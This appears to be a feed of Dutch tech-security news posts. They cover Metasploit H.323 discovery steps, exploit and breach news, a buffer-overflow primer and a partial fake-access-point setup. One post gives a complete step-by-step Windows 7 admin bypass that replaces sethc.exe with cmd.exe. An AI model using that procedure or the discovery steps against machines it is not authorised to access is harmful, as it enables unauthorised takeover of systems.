    Alle uitgebrachte Metasploit versies bevatten een scan module om snel H.323 ondersteunende systemen (met automatische binnenkomende oproepen) te indentificeren. Deze module is opgenomen in de standaard 'discovery' modus van Metasploit Pro (gratis trial) en kan gebruikt worden om snel  een groot netwerk op kwetsbare systemen te scannen. Dit proces werkt ook voor de gratis Metasploit Community Edition. Het proces om met Metasploit Pro H.323-apparaten te ontdekken staat hieronder beschreven:

    1. Login to the web interface on https://metasploit:3790/
    2. Create a new Project
    3. Choose the Scan option
    4. Expand "Advanced Options" and enter "1720" into the Custom TCP Ports parameter
    5. Uncheck UDP and SNMP discovery options to increase scanning speed
    6. Launch the Scan task
    7. Once complete, browse to Analysis -> Services
    8. Enter "h323" into the Search box on the upper right

    If you have already used the Scan component with the default settings, after applying any update in the last month, you should already have results available. Any device that accepted an incoming call should be identified by a minimum of protocol version and Vendor ID. Most devices will return the Product ID and DisplayName (Caller ID).


    mspro

    H.323 Clients
    Om een geïdentificeerde dienst te valideren, is een een H.323-compatibele client nodig. Denk bierbij aan  NetMeeting (Windows XP), Ekiga (cross-platform, maar buggy), Mirial Softphone (commercieel), of ClearSea In the Cloud (alleen in staat omaan het internet blootgestelde apparaten te scannen). Voor de interne systemen, is NetMeeting op een virtuele XP machine de meest betrouwbare H.323-client. Deze  mist wel de Pan-Tilt-Zoom (PTZ) en keypad controle van een meer geavanceerde client zoals Mirial of ClearSea In de Cloud.

    T_Ekiga_in_a_Call
    Conclusie

    Video conferencing systemen zijn een van de meest gevaarlijke, maar tevens ook de minst bekende security risico's. De populariteit van video-conferencing systemen neemt alleen maar toe, waardoor industriële spionage eenvoudig wordt gemaakt. Hoewel veel leveranciers beperkte veiligheidsmaatregelen bieden, hebben deze de neiging om genegeerd te worden in de echte wereld, door zowel IT-personeel als security auditors.  

    Lees meer... Rapid7.com

  • xbox-720De opvolger van de Xbox 360 krijgt naar verluidt een gpu die gebaseerd is op AMD's Radeon HD 6670. De machine moet zes keer zo krachtig worden als de Xbox 360 en zou in oktober of november van 2013 in de schappen moeten liggen.

    Dat meldt IGN op basis van bronnen die kennis hebben van Microsofts komende console. Eerder gingen geruchten dat Microsoft voor een gpu uit AMD's HD 7000-serie zou kiezen, maar volgens IGN is dat niet het geval. In augustus van dit jaar zouden de definitieve developmentkits naar ontwikkelaars verstuurd worden, waarna de console zelf eind 2013 moet uitkomen.

    De HD 6670 is een midrange-kaart die in februari 2011 op de markt kwam en die gebruikmaakt van een Turks-gpu, gebaseerd op AMD's vliw5-architectuur. De desktopvariant heeft een kloksnelheid van 800MHz en kan gddr5-videogeheugen aansturen op 4000MHz. De videokaart ondersteunt DirectX 11, 3d-output en 1080p-uitvoer. Voor de processor zou Microsoft opnieuw in zee gaan met IBM en zijn PowerPC-ontwerp, al gaan er ook geruchten dat de nieuwe Xbox de ARM-architectuur gaat gebruiken.

    Mocht deze gpu inderdaad zijn weg naar de nieuwe Xbox vinden, dan wordt hij waarschijnlijk nog aangepast. Gezien de verwachte releasedatum in 2013 zal de chip waarschijnlijk niet meer op het 40nm-procedé gefabriceerd worden, zoals met de desktopversie het geval is, maar op een 28nm-procedé. Hiermee kan het maximale tdp, dat voor de desktopvariant op 66W ligt, flink worden verlaagd.

    Hoewel de HD 6670 voor pc's een midrange-kaart is, kunnen spelontwikkelaars uit een vergelijkbare chip in de nieuwe Xbox behoorlijk wat prestaties halen. Bij consoles is er in de regel namelijk minder overhead en omdat ontwikkelaars voor een specfieke chip schrijven, kunnen ze hun code beter optimaliseren.

    bron: tweakers.net 

  • Uniblue DriverScanner 2012,  kost normaal gesproken 24,95 euro. Nu kun je hem gratis downloaden met onderstaande methode.

    Uniblue DriverScanner 2012 is een hele handige driver beheer applicatie die altijd uw systeem bijwerkt met de nieuwste drivers. Het programma scant uw systeem voor geïnstalleerde stuurprogramma's, en controleert dan de nieuwste versie van deze drivers op de internet . 

    ds-overview

    Uniblue DriverScanner 2012 kan controleren en updaten van allerlei drivers die nodig zijn, inclusief display, geluid, processor, chipset, USB, harde schijven, en game-controller drivers.  In aanvulling op het bijwerken van stuurprogramma, kan DriverScanner ook back-up maken en drivers herstellen- dit kan erg handig zijn als je het opnieuw windows gaat installeren.

    Ook dit aanbod is voor het Verenigd Koninkrijk alleen zo moeten gaan door de proxy. En zijn waarde voor de Uniblue DriverScanner 2012 Volg de onderstaande stappen om gratis Uniblue DriverScanner 2012 grijpen
    1. Klik hier om Britse proxy te bezoeken
    2. Kopieer link naar de promo pagina te bezoeken - http : / / mag.uniblue.com / computershopper / ds / index.html
    3. Vul uw gegevens in en klik op de "Haal je GRATIS product" knop.
    4. Volg de activering instructies in de e-mail naar Uniblue DriverScanner 2012 te openen
  • windows-gat

    Een zero-day gat in Windows laat malafide dll-bestanden draaien met systeemrechten. Daarvoor is wel eerst kraken van de MD5-hash voor de legitieme dll nodig, wat niet voor gewone krakers is weggelegd.

    Het lek is ontdekt door de Argentijnse serurity-researcher Cesar Cerrudo en zit alleen in Windows 7 en Windows Server 2008. Volgens hem gaat het om een 'elevation of privileges'-probleem, waardoor een kwaadwillende hogere rechten kan verkrijgen. Een gewone gebruiker kan namelijk code draaien die vervolgens wordt uitgevoerd op het hogere rechtenniveau van het systeemaccount.

    DLL-kaping tijdens installatie

    Tijdens de installatie van een nieuw programma wordt een tijdelijk dll-bestand aangemaakt in de temp-submap van Windows Installer. Bestanden in die installer-map worden standaard uitgevoerd met privileges van het systeemaccount. Doorgaans is dit geen probleem omdat de bestanden in de hoofdmap horen bij reeds geïnstalleerde applicaties.

    Een aanvaller kan hier echter misbruik van maken door het legitieme dll-bestand te vervangen door een nieuwe met ingebouwde aanvalscode. De MD5-hash van het legitieme bestand moet dan wel worden gekraakt, omdat de Windows Installer het bestand aan de hand daarvan controleert.

    Vooral voor inlichtingendiensten

    Het praktische probleem voor kwaadwillenden is vooral het gebruik van MD5 bij die controle. Deze encryptietechniek wordt al een aantal jaren niet meer als veilig beschouwd: het kan gekraakt worden. Daarvoor zijn wel krachtige computers nodig, of gecombineerde opstellingen met multicore videokaarten.

    Het ontdekte beveiligingsgat is dus niet makkelijk uit te buiten. De ontdekker verwacht hierdoor niet dat er snel een exploit zal komen. Hij ziet eerder voor zich dat inlichtingendiensten er misbruik van zullen maken. "Inlichtingendiensten, die bekend staan om hun crack-technologie en -kracht, zouden hiermee een zero-day exploit kunnen maken voor Windows", zegt Cerrudo.

    'In 2005 al verbannen'

    Cerrudo vraagt zich verder nog hardop af waarom Microsoft MD5 nog gebruikt voor deze controle. Het gebruik van MD5 zou volgens hem in 2005 al zijn verbannen in Microsofts Software Development Lifecycle (SDL). De SDL is een vast onderdeel in het ontwikkelproces bij Microsoft, bedoeld om softwarelekken te verminderen.

    "Er zou controle moeten zijn geweest op het bouwen van deze onderdelen, of deze componenten zijn gebouwd zonder aan de richtlijnen te voldoen", schrijft Cerrudo. Hij vermoedt dus opzettelijke omzeiling van Microsofts eigen regels voor veilige softwareontwikkeling.

    De ontdekker toont in enkele YouTube-filmpjes hoe het 0-day lek valt te misbruiken. Hier valt te zien hoe een installer start met lage rechten, maar hoe het MsiExec.exe-proces vervolgens draait met systeemrechten:

    Bron: Webwereld.nl

  • WhatsApp-logoWhatsApp blijkt een bug die het mogelijk maakt om de status van een andere gebruiker te veranderen, niet te hebben opgelost. Een hacker heeft een Windows-tool vrijgegeven waarmee de status van elke gebruiker kan worden aangepast.

    Vrijdag schreef Tweakers.net over een kwetsbaarheid in het WhatsApp-protocol die het mogelijk maakte om van elke andere gebruiker de WhatsApp-status aan te passen. Een hacker demonstreerde de kwetsbaarheid op een website, WhatsAppStatus.net, waarop een bezoeker enkel iemands telefoonnummer hoefde in te voeren om de status te wijzigen. Het ging om de status die wordt getoond in de lijst met contactpersonen.

    WhatsApp beloofde de kwetsbaarheid te dichten en voorkwam dat gebruikers de exploit van WhatsAppStatus.net nog konden gebruiken. Afgelopen maandag bezweerde een woordvoerder van de chatapplicatie dat het probleem definitief was opgelost. Niets blijkt minder waar; de kwetsbaarheid is nog steeds aanwezig en de hacker heeft een nieuwe tool vrijgegeven die dat bewijst.

    "Ze hebben enkel onze website-ip geblokkeerd", zo is te lezen op de site. Daarom hebben de hackers een tool voor Windows vrijgegeven die precies hetzelfde doet. De applicatie blijkt inderdaad te werken; de WhatsApp-status van anderen wordt naar wens aangepast, hoewel een gebruiker WhatsApp moet afsluiten en opnieuw moet starten om de nieuwe update te zien.

    Het programma is op eigen verantwoordelijkheid te gebruiken, waarschuwt de hacker, maar hij belooft dat hij geen gegevens opslaat en dat er geen spyware in de executable zit. De applicatie bevat volgens 43 virusscanners inderdaad geen malware.

    Eerder ontdekte een lezer van Tweakers.net dat WhatsApp berichten onversleuteld opslaat. Kort daarvoor maakte een fout in de sms-verificatie van WhatsApp het mogelijk om berichten van anderen te lezen.

    whatsapp-security-leak

    Bron: Tweakers.net

  • windows_patchEr is een exploit voor een net gepatcht beveiligingslek in Windows verschenen, waarmee aanvallers vrij eenvoudig webservers uit de lucht kunnen halen. Het gaat om de hash collission Denial of Service-kwetsbaarheid in ASP.NET. Door het sturen van een speciaal geprepareerde HTTP request, die kleiner dan 100kb is, kan een aanvaller de processor honderd procent belasten. Vanwege de ernst van het probleem besloot Microsoft net voor het einde van het jaar een noodpatch uit te brengen. 

    De exploit werd op de Full-disclosure mailinglist gepubliceerd en is via Github te downloaden. "get it. use it. spread it. We are Legion. Expect us", aldus "HybrisDisaster", de auteur van de exploit. Hij stelt dat mensen de exploit, die van eenvoudig uit te voeren instructies is voorzien, naar eigen inzicht moeten gebruiken.

    bron: security.nl

  • DOS-attackEen onderzoeker heeft een nieuwe methode ontdekt om met een enkele computer een succesvolle denial of service-aanval op een server uit te voeren. Normaal gesproken is de bandbreedte van aanzienlijk meer pc's nodig voor een aanval.

    De onderzoeker, Sergey Shekyan van Qualsys Security Labs, heeft inmiddels een proof of concept ontwikkeld dat gebruikt zou kunnen worden om vanaf één computer een server plat te leggen. Bovendien, zo stelt de onderzoeker, is de kans om ontdekt te worden tijdens de aanval erg klein.

    Shekyan noemt zijn aanvalsmethode de Slow Read-aanval en heeft eerder deze week de werking ervan uit de doeken gedaan. Door misbruik te maken van een eerder ontdekte kwetsbaarheid in het tcp-protocol kan een aanvaller zelf invloed uitoefenen op de snelheid waarmee een server de gegevens probeert af te leveren. Tijdens dit proces controleert de server echter ook continue of het systeem van de ontvanger, in dit geval dus de aanvaller, al klaar is om meer data te ontvangen. Hierdoor loopt het geheugen van de server vol met data die nog verzonden moet worden, waardoor er uiteindelijk geen resources meer beschikbaar zouden kunnen zijn om legitieme bezoekers toegang tot de site te geven.

    Om de aanval succes te kunnen uitvoeren is het volgens Shekyan nodig om de send buffer size van de server te weten omdat tcp deze waarde niet zelf vrijgeeft. Voor de meeste servers staat dit echter ingesteld op een standaardwaarde tussen de 65Kb en 128Kb. Ook moet de response van de server groter zijn dan die send buffer size, wat volgens de onderzoeker met de hedendaagse omvang van webpagina's niet echt een probleem zal zijn.

    In potentie kan de ontdekking van de onderzoeker verstrekkende gevolgen hebben. Hoewel er voor zover bekend nog geen tools zijn die deze manier misbruiken om servers aan te vallen, is de kans dat deze ontwikkeld zullen worden groot.

    De aanvalsmethode werkt in ieder geval op standaardconfiguraties van Apache, nginx, lighttpd en IIS 7.5. Echt goede verdedigingsmechanismen zijn er volgens Shekyan niet, anders dan niet zomaar persistent connections en http-pipelining toe te staan op de server en de absolute connection lifetime te beperken tot een realistische waarde.

    Bron: tweakers.net

  • Printer_hackBERLIJN – Door het printen met een aangepast bestand is het mogelijk printers te hacken en daarmee bedrijven af te luisteren. Een oplossing is nog niet voorhanden.

    Dat blijkt uit studie door beveiligingsonderzoeker Andrei Costin, die zijn werk presenteerde op de hackerconferentie 28C3 in Berlijn.

    Tijdens zijn lezing demonstreerde hij een aanval op printers van Xerox waarop hij in staat is programmatuur te installeren.

    Dat is mogelijk door een zwakheid in het systeem bij het afdrukken. Door een manipulatie op een bestand uit te voeren kon Costin het installeren van programmatuur in werking zetten.

    Overnemen
    Omdat de printers aangesloten zitten op netwerken kunnen zij meer functies uitvoeren.

    “In feite is dit een computer”, zegt de onderzoeker. Daardoor wordt het bijvoorbeeld mogelijk om af te luisteren wat er precies geprint wordt, verdere aanvallen op het netwerk uit te voeren of het netwerk te tappen.

    Bijkomend probleem is dat veel bedrijfsmatige printers inmiddels ook beschikken over een harde schijf waarop meer software kan worden opgeslagen.

    Uit onderzoek blijkt ook dat tienduizenden van deze printers op internet zijn aangesloten. De aanval kan daardoor niet alleen binnen een bedrijf worden uitgevoerd, maar ook via internet. Een opkomend aanvalsscenario is het kraken van printers via draadloze netwerkmodules die vaak met het apparaat worden meegeleverd.

  • java-securityVoor de meeste gebruikers is Java overbodig en omdat er veel veiligheidsproblemen zijn doet de gemiddelde gebruiker er verstandig aan de software te deleten.

    Volgens beveiligingsbedrijf F-Secure is Java onveilig en intussen bijna overbodig. Vanwege het grote aantal gaten in de software doen de meeste gebruikers er verstandig aan het van hun systeem te verwijderen. In een blog waarschuwt Mikko Hypponen, het hoofd van de onderzoeksafdeling, dat exploits in Java een groot risico vormen voor de veiligheid van de gebruiker.

    BlackHole als voorbeeld
    Als voorbeeld haalt Hyponen het beheerspaneel aan van exploitkit BlackHole. Daarin is te zien dat een Java-lek met de naam 'Rhino' verantwoordelijk is voor 83 procent van de geslaagde aanvallen met die kit. Volgens F-Secure worden Java-lekken nu standaard ingebouwd in vrijwel alle veelgebruikte exploitkits.

    Hypponen roept gebruikers die de Java-software echt nodig hebben op altijd te checken of ze de laatste versie van de software hebben en de plugin uit de standaardbrowser te verwijderen. "Als u Java echt nodig hebt voor een specifieke webapplicatie, zorg dan dat u de plugin uit de browser haalt die u dagelijks gebruikt. Gebruik de webapplicatie die Java nodig heeft voortaan in een andere browser", schrijft Hypponen op het blog.

    Pluim voor Chrome
    Complimenten heeft F-Secure voor Chrome. Google's browser is volgens Hypponen het beste in het afweren van aanvallen. "De meeste Java-exploits werken niet in Chrome en de browser gebruikt geen Adobe Reader-plugin om PDF's te renderen." Volgens Hypponen is dit goed nieuws, omdat Chrome steeds meer marktaandeel aan het winnen is.

    Steeds meer kritiek
    Er komt steeds meer kritiek op de Java-software. Recent nog stopte Ubuntu-maker Canonical met de distributie van Sun Java naar het besturingssysteem. De software zal zelfs op afstand worden gedeactiveerd en verwijderd. Microsoft waarschuwde eind november ook al voor Java-aanvallen. Volgens het bedrijf mikt 50 procent van alle malware op gaten in Java. Firefox-maker Mozilla zette de Java-techniek in september ook al op het strafbankje vanwege onveiligheid.

    Bron: Webwereld.nl

  • abnamroIn de eerste helft van dit jaar wisten cybercriminelen bij Nederlandse internetgebruikers 11,2 miljoen euro van online bankrekeningen te plunderen. De meeste van deze aanvallen vonden via phishing plaats, aldus de Nederlandse Vereniging van Banken (NVB). Toch waren er ook gevallen waarbij malware werd ingezet. Onderzoekster Sasha-Helena van den Heetkamp ontdekte onlangs een variant van de SpyEye Trojan op één van haar machines.

    Ze besloot de website van haar bank, de ABN AMRO, te bezoeken. "Tot mijn grote verrassing was de poging om mijn gegevens te kapen erg goed gedaan. Zelfs voor een ervaren beveiligingsonderzoeker als ik, was het lastig om te zien wat er gebeurde." Het Trojaanse paard injecteerde stukjes code in de browser. Als ze naar https://www.abnamro.nl ging, wat een beveiligde verbinding is, werd er code op de bankpagina geïnjecteerd.

    Java
    De geïnjecteerde code viel op door een venster met een voortgangsbalk. Vervolgens stuurde de malware een request naar een domein, om daar de gekaapte rekeningnummer en twee-factor authenticatiecodes naar toe sturen. "Dit soort aanvallen zijn zeer ernstig, dus heb ik het bij de ABN AMRO gemeld." 

    Hoe de machine besmet raakte weet Van den Heetkamp niet zeker, maar ze vermoedt een drive-by download-aanval op een ongepatcht Java-lek. Onlangs werd bekend dat SpyEye zich inderdaad via een recent Java-lek verspreidt. "De virusscanner detecteerde het niet. Het enige programma dat de infectie kon vinden was ComboFix."

    abnamro-rootkit

    Bron: security.nl


  • ov-chipkaart.nlOp een weblog zou nieuwe software zijn verschenen om binnen tien seconden de OV-chipkaart te kraken, zonder dat hier externe apparatuur voor nodig is. Volgens het op Google gehoste "OVchipkaarthacken" blog, met als slogan "Hack binnen 10 seconden uw OV zonder externe apparatuur!", is het in zes stappen mogelijk om met de kaart te frauderen. Hierbij wordt op de kaart aangegeven op welk station men is ingecheckt, iets wat volgens het blog niet door een conducteur is te detecteren. 

    Het lijkt hier om een nieuwe versie van het programma te gaan waarmee IT-journalist Brenno de Winter begin dit jaar de kwetsbaarheden van de OV-chipkaart aantoonde. Hij besloot de software toen niet openbaar te maken. Uiteindelijk verscheen de "OVstation" applicatie toch op Torrentsite de The Pirate Bay

    Oekraïne
    Het bericht op het weblog is gisteren verschenen. Het aangeboden bestand dateert echter van 25 oktober. Toen werd het namelijk voor het eerst door iemand op VirusTotal op malware gecontroleerd. Geen één van de 42 gebruikte virusscanners zegt dat er kwaadaardige code in aanwezig is. Het is echter onduidelijk door wie de software gemaakt is. 

    Het bestand wordt op een Oekraïens IP-adres gehost. In de meegeleverd tekst staat "Dit programma kan bij een dump van een OV-chipkaart de gegevens van de laatste check-in aanpassen. Hiermee kunt u dus thuis inchecken zonder dat er saldo van uw kaart wordt afgeschreven."

    bron: security.nl

  • windows7This is a new exploit for bypassing windows 7 admin security which requires no CDs or other third party tools. I don't know if its been patched or not, but I'm sure that it 100% works.

    1. Press the power button to turn on your computer. 
    2. While your on the screen with the animated Microsoft logo press and hold the power button until it turns off. 
    3. Press the power button to turn on again. 
    4. You should now see the option to launch Start Up Repair. Select the option and press enter. 
    5. Run Startup Repair. 
    6. You should see a blue bar that moves across the screen repeatedly. Above it should be messages that say "searching for problems" or something. 
    7. The message should change to "Attempting repairs" within a few minutes. 
    8. Leave the computer running. This message should be there for 10-40 minutes depending on your computer. 
    9. After 10-40mins a message should pop up that says "start up repair could not fix the problem". Click the arrow next to "show problem details". 
    10. Scroll to the bottom and click the link to the .txt file. 
    11. Notepad should open up with the file. 
    12. In notepad click File->Open. 
    13. You can now use the file browser to perform the sethc.exe hack. 
    14. Go to C:\Windows\system32 and find sethc.exe and rename it to random.exe or something. 
    15. Copy the cmd.exe and rename the copied file to sethc.exe
    16. Restart the computer and at the login screen press the "shift" key 5 times in quick succession.
    17. Type in the cmd window "control userpasswords2" without the quotation marks. 
    18. You can now make a new admin account and login with it or make your account an admin.
  • fuzzing
    Er is een nieuw probleem met de Apache HTTP webserver ontdekt, waardoor aanvallers toegang tot interne systemen kunnen krijgen. Het probleem ontstaat als er bepaalde instellingen niet goed zijn ingesteld. Het gaat om een variant van een probleem (CVE-2011-3368) dat eerder bij bepaalde mod_proxy/mod_rewrite configuraties werd ontdekt, en waarvoor Apache uiteindelijk een update uitbracht. Ook nu wordt er aan een patch gewerkt, zo laten de ontwikkelaars weten. 

    De variant werd ontdekt door Prutha Parikh van beveiligingsbedrijf Qualys. Tijdens een controle van de patch voor CVE-2011-3368, ontdekte ze dat het nog steeds mogelijk is om een exploit naar een volledig gepatchte Apache webserver te sturen. Parikh maakte een blogposting waarin ze twee voorbeelden geeft hoe een aanvaller via verkeerd ingestelde RewriteRule/ProxyPassMatch regels de beveiliging kan omzeilen. 

    Apache heeft nog geen patch uitgebracht, tot die tijd adviseert Parikh dan ook om de reverse proxy via deze manier in te stellen.

    bron: security.nl

  • sql-injectionDoor een lek in een beheersysteem zijn 2,3 miljoen persoonsgegevens toegankelijk. Bovendien zijn met één gelekt wachtwoord 160 websites van publieke omroepen en radiostations toegankelijk.

    De websites van onder andere QMusic, 3FM, Slam FM, KRO, Omroep.nl, BNN, diverse publieke radiozenders en RTV Noord-Holland zijn lek. Dat ontdekte de hacker 'BitBuster', die het meldde aan Webwereld.

    Ook de NTR maker van onder andere het Klokhuis, Sesamstraat, het Sinterklaasjournaal, Raymann is Laat, het Groot Dictee der Nederlandse taal, enzovoort. Ook bij BNN gaat het om sites behorend bij programma's als Spuiten en Slikken, Weg met BNN, de MaDiWoDoVrijdagshow en Patrick in Uruzgan.

    Lek cms
    Het gaat om een content management systeem (cms) ABC Manager van het bedrijf Angry Bytes, waarbij een oude versie gevoelig bleek voor SQL-injection. In de databases kwamen zowel leesbare als makkelijk te achterhalen wachtwoorden voor. Een van de beheerderswachtwoorden bleek voor alle sites te werken, waardoor het mogelijk is websites aan te passen.

    Het gaat om diverse tabellen met persoonsgegevens. Vaak naam, adres, e-mail, telefoonnummer. Soms om achtergelaten reacties, soms om gegevens voor dating. Bij Q Music gaat het niet alleen om de NAW-gegevens, maar ook om het bedrijf waarvoor mensen werken en de functie. Bij sommige programma's wordt ook een foto meegeleverd.

    Sommige tabellen bevatten de informatie van honderdduizenden mensen. Zo gaat het bij het Klokhuis om ruim 230.000 adressen, terwijl 3FM meer dan een half miljoen namen beheert.

    Klanten informeren
    Angry Bytes, het bedrijf dat de weboplossingen voor de verscheidene omroepen biedt, reageert geschrokken. Er is direct overleg gevoerd met klanten, online redactie-omgevingen afgesloten en lekken gedicht. Ook stelt het bedrijf nog in overleg te zijn om herhaling te voorkomen. "We zijn hier heel erg van geschrokken en kijken met onze klanten naar oplossingen om herhaling te voorkomen."

    Hacker BitBuster motiveert zijn actie als volgt: 
    "Ik hoop dat mensen, door mijn actie, gaan inzien dat het zo niet langer kan; er moet iets veranderen. Bedrijven moeten verantwoordelijk gehouden worden voor programmeerfouten en moeten worden gecontroleerd. Je kunt ze niet op hun blauwe ogen geloven en de vraag is of het uit onkunde of onwil is."

    Bron: Webwereld.nl 

  • backtrack5Recently I needed to setup a fake access point for a presentation, I fired up my Backtrack5 VM, Connected my Alfa AWUS036H USB adapter and started to configure the Fake AP.

    There are a lot of Tutorials and Scripts for setting up a Fake AP,  The “Gerix”  tool also have an option to auto set a Fake AP (for some reason this tool never worked for me).

    I started to setup my fake AP and had run into some trouble for a strange reason.

    I decided to put my experience here hopefully you’ll find it useful.

    Started by putting my Wlan interface in monitor mode

    root@Blackbox:~/fakeap#

    I noticed the following error: “Unknown error 132″
    Tried using airodump-ng to see what happens…

    root@Blackbox:~/fakeap#

    Got the same error.

    The solution was simply to unload the RTL8187 and Load the R8187 driver instead as follows:

    root@Blackbox:~/fakeap#

    Tried putting wlan In monitor mode again

    root@Blackbox:~/fakeap#

    Well, that fixed the problem

    root@Blackbox:~/fakeap#

    Now we can proceed to the fake ap setup process

  • buffer-overflowIn this post we'll discus some basics about buffer overflows also known as buffer overruns. So before we discus what is buffer overflow or buffer overrun is we will have a look on what exactly is buffer. Computer stores information in form of bits, for example if you want to store number 3 in computer's memory it will be stored in its binary form which is 11, as you can see 11 will require 2 bits to get stored in memory that indirectly means the number 3 will require 2 bits of computer memory or 2 bits of buffer. In simple words buffer is amount of memory allocated for particular variable or element.

    Now consider the name of space where number 3 is stored is ' x ' that means total capacity of ' x ' is 2 bits. It can easily store number 0,1,2,3 in it. Now suppose we want to replace 3 by 4 in allocated memory x. Number 4 can be denoted as 100 in binary which actually requires 3 bits for memory allocation and hence when you'll try to stuff 3 bits of information in 2 bits of memory space the program will end up giving error prone and unwanted output which is in other terms known as buffer overflow and the act of manipulating this unwanted output for benefit is known as buffer overflow attack.

    Lets take a funny example to explain above technical stuff in easy manner. Consider a person Rajan is capable of eating 10 apples and he eats 15. 10 apples can be considered as buffer capacity of Rajan and since he ate 15 apples Rajan will end up with unwanted output as indigestion and acidity.

    Buffer overflow problems are not easy to discover, even if they are discovered they aren't that easy to exploit even for a programmer with more than 6 to 10 years of experience in programming (unless his job was to write exploit as a programmer). Buffer overrun problems are found in web based applications like, web browsers, ftp browsers, web servers, IRC clients, network based applications etc where C, C++ or similar high level programing language is used which is capable of dynamic memory allocation. 

    To create an exploit for buffer overrun an attacker needs source code and output of program and in very few cases any one of them. It is practically impossible to create an buffer overflow exploit without above information and hence only experienced programmers are capable of building exploits since they are capable of understanding even complex pieces of source codes.

    I hope above basics is okay for now, in future post we will cover its types, how it works and how to code and write basic and advanced buffer overflow exploits, thanks for reading have a nice time.

    Source: nrupentheking.blogspot.com

  • pleisterMicrosoft heeft tijdens de patchcyclus van november vier lekken verholpen, waaronder één zo ernstig dat een aanvaller door het versturen van UDP-pakketten kwetsbare systemen kan overnemen. De belangrijkste update is Microsoft Security Bulletin MS11-083, voor een lek in TCP/IP, waardoor het uitvoeren van willekeurige code mogelijk is. Door het sturen van een continue stroom van speciaal geprepareerde UDP-pakketten naar een gesloten poort van een systeem, kan een aanvaller een integer overflow veroorzaken en het systeem vervolgens overnemen. 

    De kwetsbaarheid bevindt zich in Vista, Windows 7 en Server 2008 en is zowel een risico voor werkstations als servers. Het lek werd direct aan Microsoft gerapporteerd en er zijn ook nog geen aanwijzingen dat de kwetsbaarheid in het "wild" wordt misbruikt. Die kans acht Microsoft ook zeer klein. 

    Exploit
    "Hoewel het laatste scenario theoretisch tot het op afstand uitvoeren van code kan leiden, denken we dat dit lastig uit te voeren is, gezien het soort netwerkpakketten die bij de perimeter worden gefilterd en het kleine tijdvenster tussen de release en volgende toegang van de structuur, en het grote aantal pakketten dat nodig is om de aanval uit te voeren", zegt Ali Rahbar van het Microsoft Security Response Center. 

    Microsoft heeft het lek daarom een "Exploitability Index" van "2" toegekend. Dit betekent dat hackers exploitcode kunnen ontwikkelen, maar dat het waarschijnlijk tot "inconsistente resultaten" zal leiden. 

    Updates
    Verder werden deze maand ook lekken in Windows Mail en Windows Meeting, Active Directory en Windows Kernel-Mode Drivers verholpen. Opmerkelijk genoeg krijgt Windows XP deze maand minder updates te verwerken dan Vista en Windows 7. 

    Een update voor het onlangs onthulde lek in de Windows-kernel, waardoor het Duqu-virus zich verspreidt, is niet uitgekomen, maar dat had Microsoft al aangekondigd. In plaats daarvan kunnen gebruikers een fix downloaden. Het installeren van de nieuwste updates kan via Windows Update of de Automatische Update functie.

    Bron: Security.nl

  • appleApple heeft de bekende beveiligingsonderzoeker Charlie Miller uit het programma voor ontwikkelaars verbannen, omdat hij een beveiligingslek had ontdekt. Dat laat Miller zelf op Twitter weten. De Mac-hacker had een kwetsbaarheid in iOS ontdekt, het besturingssysteem voor de iPhone en iPad. Via het lek was het mogelijk om kwaadaardige apps in de Apple App Store te plaatsen, zonder dat Apple dit door had. 

     

    Om te bewijzen dat het uitvoeren van ongesigneerde code mogelijk was, plaatste Miller zijn demo app in de App Store. De applicatie toont real-time beursinformatie, maar staat ook in verbinding met een server waardoor Miller het programma opdrachten kan geven, waaronder het bekijken van het adresboek. De controles die Apple uitvoert voorkomen het uitvoeren van ongesigneerde code op de iPhone, maar Miller weet dit via het lek te omzeilen. 

    Miller is van plan om zijn ontdekking volgende week tijdens de SysCan conferentie in Taiwan te presenteren. "Nu heb je een programma in de App Store zoals Angry Birds dat nieuwe code op je telefoon kan uitvoeren die Apple nooit heeft kunnen controleren", aldus Miller. "Met deze bug kun je er niet meer zeker van zijn dat wat je van de App Store downloadt, zich ook netjes gedraagt."

  • hitcher

    Een relatief onbekende hacker die opereert onder het alias Hitcher heeft ruim veertig websites beklad, waaronder twaalf Belgische sites. De hacker, vermoedelijk afkomstig uit Pakistan, sympatiseert met de losvaste groepering Anonymous.

    In de statements die Hitcher op de gekraakte websites heeft achtergelaten, wordt geageerd tegen de Navo, de EU en de Amerikaanse strijdkrachten. Ook wordt het door Anonymous gebruikte masker getoond. waaronder twaalf Belgische sites. De hacker, vermoedelijk afkomstig uit Pakistan, sympatiseert met de losvaste groepering Anonymous.

    Onder de getroffen websites is een opvallend groot aantal Belgische websites, terwijl .nl-sites in de lijst ontbreken. Mogelijk zijn de twaalf getroffen Belgische sites slachtoffer van een dns-hack aangezien de domeinnamen verwijzen naar de dns-server van de firma Register.be.

    Het is niet de eerste keer dat Hitcher toeslaat. In augustus wist de vermoedelijk Pakistaanse hacker dertig Chinese overheidswebsites te kraken en in september claimde Hitcher ruim 140 websites te hebben defaced.

    Bron: Tweakers.net

  • email_account_hackOnderzoekers van beveiligingsbedrijf HP / TippingPoint DVLabs besteden hun vrije tijd op zoek naar publiekelijk geplaatste lijsten van gekraakte e-mailadressen. Ze hebben een programma's geschreven die diverse bronnen met gestolen gedumpte data (inclusief pastebin) scant. De collectie is inmiddels uitgegroeid tot 5.000.000 gecompromitteerde e-mail accounts, en groeit nog steeds!

    Als je nieuwsgierig bent om te zien of uw e-mailadres of gebruikersnaam ier tussen staat ga dan naar PwnedList.  

    De lijst is verre van compleet maar het is maar een kleine moeite om het even je e-mailadressen/gebruikersnaam te controleren. Het is gratis, en supersnel.

    Privacy 
    Ze slaan geen gestolen wachtwoorden op: De PwnedList databank bevat alleen publiekelijk geplaatste e-mailadressen en gebruikersnamen. De slechteriken kunnen stelen alle vijf miljoen platen in de PwnedList database en het zal niet overal krijgen ze.

    DV labs is ook uitermate bewust van het potentieel voor privacy problemen. Derhalve beloven zegeen input op te slaan en zal geen gebruik maken van het online ingevulde e-mail adres. Als je het echt niet vetrouwd kun altijd nog SHA-512 hash gecodeerd e-mailadres gebuiken.

  • Follow This! is a first person shooter game utilizing the Microsoft Kinect camera. Input a twitter search term to create birds, varying based on the loaded tweets. Once all of the tweets have been gathered, you are equipped with gatling gun arms. Aiming your arms in physical space is reflected in the game. Open your hands to fire and pulverize as many birds as possible, earning score multipliers for quick hits. You must blast an increasing minimum amount of birds to advance to the next level, if not, fail whale; game over.

    Source: Nickhardeman.com

     

    Read more..

  • ov-chipkaart.nlHet is erg simpel sessies van anderen op ov-chipkaart.nl over te nemen. Wie kwaad wil kan het account opheffen, persoonlijke gegevens aanpassen of reisgedrag van reizigers zien. Een beginnersfout.

